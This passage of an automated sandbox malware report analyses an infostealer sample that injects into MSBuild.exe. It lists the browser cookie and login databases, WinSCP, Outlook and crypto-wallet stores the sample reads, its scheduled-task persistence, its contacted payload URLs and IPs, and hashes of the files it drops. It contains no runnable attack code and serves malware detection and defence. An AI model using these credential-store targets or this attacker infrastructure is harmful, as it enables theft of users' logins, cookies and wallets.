                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeQueries volume information: C:\Users\user\AppData\Roaming\WareHouse.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC_config_file
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash_config_file
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyAaiaifbiceejhhkfbjdgonjgljkpcdhch
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus_directory
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum_directory
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3813836224.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mu7iyblZk8.exe PID: 7560, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7732, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1272, type: MEMORYSTR
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                  Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers
                  Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                  Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items
                  Defense Evasion: 1 Disable or Modify Tools; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 41 Virtualization/Sandbox Evasion; 311 Process Injection
                  Credential Access: 1 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                  Discovery: 133 System Information Discovery; 211 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Remote System Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                  Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
                  Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
                  [Behavior graph. Behavior Graph ID: 1483418, Sample: Mu7iyblZk8.exe, Startdate: 27/07/2024, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label
                  Mu7iyblZk8.exe | 24% | Virustotal |
                  Mu7iyblZk8.exe | 37% | ReversingLabs | Win32.Trojan.Generic

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Roaming\WareHouse.exe | 37% | ReversingLabs | Win32.Trojan.Generic
                  C:\Users\user\AppData\Roaming\WareHouse.exe | 24% | Virustotal |

                  No Antivirus matches

                  Source | Detection | Scanner | Label
                  ipinfo.io | 0% | Virustotal |
                  fp2e7a.wpc.phicdn.net | 0% | Virustotal |

                  Source | Detection | Scanner | Label
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                  https://ipinfo.io/missingauth | 0% | Avira URL Cloud | safe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd | 0% | Avira URL Cloud | safe
                  https://investdirectinsurance.com/7f) | 0% | Avira URL Cloud | safe
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bd | 0% | Avira URL Cloud | safe
                  https://investdirectinsurance.com/sf | 0% | Avira URL Cloud | safe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd | 1% | Virustotal |
                  https://investdirectinsurance.com/ | 0% | Avira URL Cloud | safe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd~ | 0% | Avira URL Cloud | safe
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bd | 1% | Virustotal |
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bdY | 0% | Avira URL Cloud | safe
                  https://collection.hubanalytics.io/ | 0% | Avira URL Cloud | safe
                  https://ipinfo.io/missingauth | 0% | Virustotal |
                  https://ipinfo.io/json | 0% | Avira URL Cloud | safe
                  https://discord.com/api/v9/users/ | 0% | Avira URL Cloud | safe
                  https://collection.hubanalytics.io/ | 0% | Virustotal |
                  https://ipinfo.io/json | 0% | Virustotal |
                  https://discord.com/api/v9/users/ | 0% | Virustotal |
                  https://investdirectinsurance.com/ | 1% | Virustotal |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  ipinfo.io | 34.117.59.81 | true | true | | unknown
                  investdirectinsurance.com | 104.21.65.79 | true | false | | unknown
                  fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bd | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
                  https://ipinfo.io/json | true | 0%, Virustotal; Avira URL Cloud: safe | unknown

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://ipinfo.io/missingauth | MSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                  https://investdirectinsurance.com/7f) | WareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://investdirectinsurance.com/sf | WareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://investdirectinsurance.com/ | WareHouse.exe, 0000000A.00000002.1466432583.000000001BBCE000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd~ | Mu7iyblZk8.exe, 00000000.00000002.1404302143.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | MSBuild.exe, 00000003.00000002.3816380121.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bdY | Mu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC61000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://collection.hubanalytics.io/ | WareHouse.exe.0.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                  https://discord.com/api/v9/users/ | Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3813836224.0000000000429000.00000040.00000400.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | true
                  104.21.65.79 | investdirectinsurance.com | United States | 13335 | CLOUDFLARENETUS | false
                  45.94.31.188 | unknown | Netherlands | 395800 | GBTCLOUDUS | false
                    Joe Sandbox version: 40.0.0 Tourmaline
                    Analysis ID: 1483418
                    Start date and time: 2024-07-27 11:36:13 +02:00
                    Joe Sandbox product: CloudBasic
                    Overall analysis duration: 0h 10m 54s
                    Hypervisor based Inspection enabled: false
                    Report type: full
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed: 19
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Sample name: Mu7iyblZk8.exe (renamed because original name is a hash value)
                    Original Sample Name: efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3.exe
                    Detection: MAL
                    Classification: mal100.spyw.evad.winEXE@19/10@2/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 282
                    • Number of non-executed functions: 25
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 13.85.23.86, 192.229.221.95, 52.165.164.15, 20.3.187.198, 40.68.123.157
                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    Time | Type | Description
                    05:37:16 | API Interceptor | 11620047x Sleep call for process: MSBuild.exe modified
                    05:37:17 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
                    10:37:17 | Task Scheduler | Run new task: WareHouse path: C:\Users\user\AppData\Roaming\WareHouse.exe
                            • 104.21.65.79
                            41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                            • 104.21.65.79
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            No context
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):425
                            Entropy (8bit):5.357964438493834
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                            MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                            SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                            SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                            SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                            Process:C:\Users\user\AppData\Roaming\WareHouse.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):425
                            Entropy (8bit):5.357964438493834
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                            MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                            SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                            SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                            SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                            Process:C:\Users\user\AppData\Roaming\WareHouse.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):47616
                            Entropy (8bit):7.3984749546983055
                            Encrypted:false
                            SSDEEP:768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
                            MD5:3E3D6FD0B466B60CA1E91DC596C05DF3
                            SHA1:9E09372C4597A6405DF167DFE5C2671F1F62A706
                            SHA-256:8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
                            SHA-512:FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
                            Malicious:false
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):549888
                            Entropy (8bit):7.502351834702483
                            Encrypted:false
                            SSDEEP:12288:8GG05BruCTSgDhijYyE0Vd8IfhH8dcSLQq/BRrYpv5aOpP1B:th5BKCTSgFKfV6AhHmLQ3vD
                            MD5:4B4817111C116D67CFBF962D471D7BA3
                            SHA1:CF81B3E931A6BFFD7B9CC8559C736EF25B69EF07
                            SHA-256:98683FAF487B5C7807471A857D1147711E0568E4B3F2EBB176E3E411CC648752
                            SHA-512:6EBAA5DB6381249A05241EDCA59EC73BA2504EDB5AA3529B1F8CEE82BCCD230F208AF2442285644F79D9299D2F377EAB35B0E2A61EF6F3DC50875FAD396D3F0A
                            Malicious:false
                            Process:C:\Users\user\AppData\Roaming\WareHouse.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):549888
                            Entropy (8bit):7.502351834702483
                            Encrypted:false
                            SSDEEP:12288:8GG05BruCTSgDhijYyE0Vd8IfhH8dcSLQq/BRrYpv5aOpP1B:th5BKCTSgFKfV6AhHmLQ3vD
                            MD5:4B4817111C116D67CFBF962D471D7BA3
                            SHA1:CF81B3E931A6BFFD7B9CC8559C736EF25B69EF07
                            SHA-256:98683FAF487B5C7807471A857D1147711E0568E4B3F2EBB176E3E411CC648752
                            SHA-512:6EBAA5DB6381249A05241EDCA59EC73BA2504EDB5AA3529B1F8CEE82BCCD230F208AF2442285644F79D9299D2F377EAB35B0E2A61EF6F3DC50875FAD396D3F0A
                            Malicious:false
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):47616
                            Entropy (8bit):7.3984749546983055
                            Encrypted:false
                            SSDEEP:768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
                            MD5:3E3D6FD0B466B60CA1E91DC596C05DF3
                            SHA1:9E09372C4597A6405DF167DFE5C2671F1F62A706
                            SHA-256:8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
                            SHA-512:FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
                            Malicious:false
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):598
                            Entropy (8bit):6.576981076252395
                            Encrypted:false
                            SSDEEP:12:5jw79RUCxx6iG80lz6SF9bZP3kUhqC2MUydF4o7YCx0G80nQz6sEt:9wZv6b4YRZPjh500F4oRfft
                            MD5:080B844A05D5DBBFC88FF8DC5186A0F3
                            SHA1:D6869F24E53310734D10118665388402A1A38862
                            SHA-256:20236F1666D4E2407C6CE2507F797AF63720D87A80C58210DAB2E41DC86874FB
                            SHA-512:E6405450A4FDAE8A2CDE460AF3468881231B855522AF03F9F5212DC839F479F35F201F6969CE75D420CCF833D60CC66BC925E76DEF35EF774AB800C8C1D21234
                            Malicious:false
                            Preview:PK.........,.X'..........."...Others\Windows Product Key\key.txt...3.5..p.......p.....2..0..PK.........,.X4`c.....4...*...Chromium\Google Chrome\Default\Cookies.txt...n.0...;.......[....P.A@......2P*..u.......81.Y.u......f.....,\lHl.P......mM/%....D.D...../._.....w.W).~...H..?..:.v|.....`GjGC.8..R+.%.d.........M.....Q.....1Y|S.O.........U$...T.w..g]^.!..<B.a..W(....vh-.mt.g.Jl...Mv..z..Gs.D..;?...PK...........,.X'...........".................Others\Windows Product Key\key.txtPK...........,.X4`c.....4...*............._...Chromium\Google Chrome\Default\Cookies.txtPK....................
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):598
                            Entropy (8bit):6.581587911540293
                            Encrypted:false
                            SSDEEP:12:5j69RUCxx6r0lz6SF9bZP3kUhqC2MUydF4CYCxF0nQz6sEt:9Ov6A4YRZPjh500F41fft
                            MD5:D6238A1E22FFE5B8C26733F5CEC028CA
                            SHA1:CC2202BD5CEE0AF44C81EEFE4B6D47326B5598CD
                            SHA-256:3832938DC2CC5C38565EC2D8723AB3394D46EBF58046EF2AF6CAF16E27AAFA90
                            SHA-512:56AE43BB84A05BEB71F1E10F8EBC8E158E734B1B14107EFD0B0A17B879E77C5D2B9E8462F6FCF6ED5BBA6D6DA4A7615D27CB2FEB8CEA5907AD3D3AA40EEC25E8
                            Malicious:false
                            Preview:PK.........,.X'..........."...Others\Windows Product Key\key.txt...3.5..p.......p.....2..0..PK.........,.X4`c.....4...*...Chromium\Google Chrome\Default\Cookies.txt...n.0...;.......[....P.A@......2P*..u.......81.Y.u......f.....,\lHl.P......mM/%....D.D...../._.....w.W).~...H..?..:.v|.....`GjGC.8..R+.%.d.........M.....Q.....1Y|S.O.........U$...T.w..g]^.!..<B.a..W(....vh-.mt.g.Jl...Mv..z..Gs.D..;?...PK...........,.X'...........".................Others\Windows Product Key\key.txtPK...........,.X4`c.....4...*............._...Chromium\Google Chrome\Default\Cookies.txtPK....................
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):79872
                            Entropy (8bit):5.8008179820157535
                            Encrypted:false
                            SSDEEP:1536:LMSYHfrowgvVhCU/EKx/s3VntC9vXQqov0cNRf4Dk/So6oa9DJjAWmJCo:LMSsfrowgdh7s3Vt0Qqov7RfCFo6oa9m
                            MD5:74F11A170C0A518CE076AE43F70A7C06
                            SHA1:86CAFA195CA0905F79A4E877C13AD0C7CED257E5
                            SHA-256:EFDAC8EAFDF875DE010FE0A6980AAD44B547C2A74430C185A28D67E98168C4B3
